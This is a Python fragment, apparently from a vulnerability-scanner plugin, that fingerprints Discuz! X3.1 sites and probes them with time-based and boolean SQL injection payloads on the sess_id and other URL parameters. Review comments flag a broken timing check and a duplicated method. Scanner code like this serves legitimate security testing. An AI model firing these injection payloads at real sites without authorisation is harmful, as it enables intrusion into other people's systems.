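def fingerprint(self, target):
    """Return True when the host of *target* serves the Discuz! X3.1 footer.

    One GET is sent to the host (``util.getHostByUrl`` + ``util.sendHttpRequest``)
    and the response body is checked for the "Powered by Discuz! X3.1" footer
    markup. A match means the target runs Discuz X3.1 and this POC applies.

    Fixes: the original returned ``False`` only from the inner branch, so a
    non-200 response fell through and returned ``None``; every path now
    returns a bool. The footer is matched as a literal substring rather than
    an unescaped regex, so the '.' in "discuz.net" is no longer a wildcard.
    """
    host = util.getHostByUrl(target)
    code, head, body, location, error = util.sendHttpRequest(host)
    if code != 200:
        return False
    marker = ('<p>Powered by <strong><a href="http://www.discuz.net">'
              'Discuz!</a></strong> <em>X3.1</em></p>')
    return marker in body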
def audit(self, target):
    """Probe ``/test.php`` for the ``sess_id`` injection and record a hit.

    The fixed probe query is appended to the host of *target* and sent once via
    ``util.sendHttpRequest``. A 200 response counts as a hit when the body
    carries the "INSERT INTO" SQL warning or the round trip took 1-3 s; the
    finding is saved through the base class's ``_addScanResult`` (which may be
    called several times, once per finding).

    Returns True when a result was recorded, otherwise False.

    NOTE(review): ``time.clock`` was removed in Python 3.8, and a float is only
    ``in range(1, 3)`` when it equals exactly 1.0 or 2.0, so the timing branch
    almost never fires. Behaviour is preserved as-is here.
    """
    probe = '/test.php?act=login&sess_id=1%27%20and%20sleep%283%29--%201'
    urlWithPayload = util.getHostByUrl(target) + probe
    start = time.clock()
    code, head, body, location, error = util.sendHttpRequest(urlWithPayload)
    if code != 200:
        return False
    warned = '<b>Warning</b>: INSERT INTO' in body
    # The delay check only runs when the warning is absent (same short-circuit as before).
    if not (warned or time.clock() - start in range(1, 3)):
        return False
    self._addScanResult({
        "method": "GET",         # HTTP request type: GET/POST/HEAD
        "post_data": "",         # POST body carrying the payload when the method is POST
        "url": urlWithPayload,   # URL that carries the payload
        "vul_key": "sess_id",    # parameter at the injection point
    })
    return True
def fuzz(self, context):
    """Inject a quote-based SQL probe into one URL parameter and record a hit.

    ``context`` supplies ``url`` (e.g. http://www.test.com/index.php?a=aaa&b=bbb&c=ccc),
    ``param`` (e.g. ``b``), ``method`` and ``post_data``. The payload is filled
    into that parameter by ``util.fillPayload``; with ``isAppend=True`` it is
    appended to the existing value (otherwise it would overwrite it), giving
    http://www.test.com/index.php?a=aaa&b=bbb1'+and+'1'%3d'1&c=ccc. A 200
    response whose body matches "SQL Error" is saved with the base class's
    ``_addScanResult`` (callable once per finding).

    Returns True when a result was recorded, otherwise False.

    NOTE(review): a second ``fuzz`` with the same body is defined directly
    after this one; inside a class the later definition replaces this one.
    """
    payload = "1'+and+'1'%3d'1"
    urlWithPayload = util.fillPayload(context["url"], context["param"], payload, isAppend=True)
    code, head, body, location, error = util.sendHttpRequest(urlWithPayload)
    if code != 200 or re.search(r"\w?SQL Error\w?", body) is None:
        return False
    self._addScanResult({
        "method": context["method"],
        "post_data": context["post_data"],
        "url": urlWithPayload,         # URL that carries the payload
        "vul_key": context["param"],   # parameter at the injection point
    })
    return True
def fuzz(self, context):
    """Fuzz one URL parameter with a quote-based SQL probe.

    Reads ``url``, ``param``, ``method`` and ``post_data`` from ``context``,
    appends the payload to the parameter's current value through
    ``util.fillPayload`` and issues one request via ``util.sendHttpRequest``.
    A 200 response whose body matches "SQL Error" is handed to the base
    class's ``_addScanResult``.

    Returns True when a result was recorded, otherwise False.

    NOTE(review): this duplicates the ``fuzz`` defined directly above it with
    identical logic; inside a class only this later definition takes effect.
    """
    url = context["url"]        # URL to fuzz, e.g. http://www.test.com/index.php?a=aaa&b=bbb&c=ccc
    param = context["param"]    # parameter to fuzz, e.g. b
    payload = "1'+and+'1'%3d'1"
    # isAppend=True appends the payload to the existing value instead of overwriting it,
    # e.g. http://www.test.com/index.php?a=aaa&b=bbb1'+and+'1'%3d'1&c=ccc
    urlWithPayload = util.fillPayload(url, param, payload, isAppend=True)
    code, head, body, location, error = util.sendHttpRequest(urlWithPayload)
    hit = code == 200 and re.search(r"\w?SQL Error\w?", body)
    if hit:
        # Save the finding via the base class; _addScanResult may be called once per finding.
        self._addScanResult({
            "method": context["method"],
            "post_data": context["post_data"],
            "url": urlWithPayload,        # URL that carries the payload
            "vul_key": context["param"],  # parameter at the injection point
        })
        return True
    return False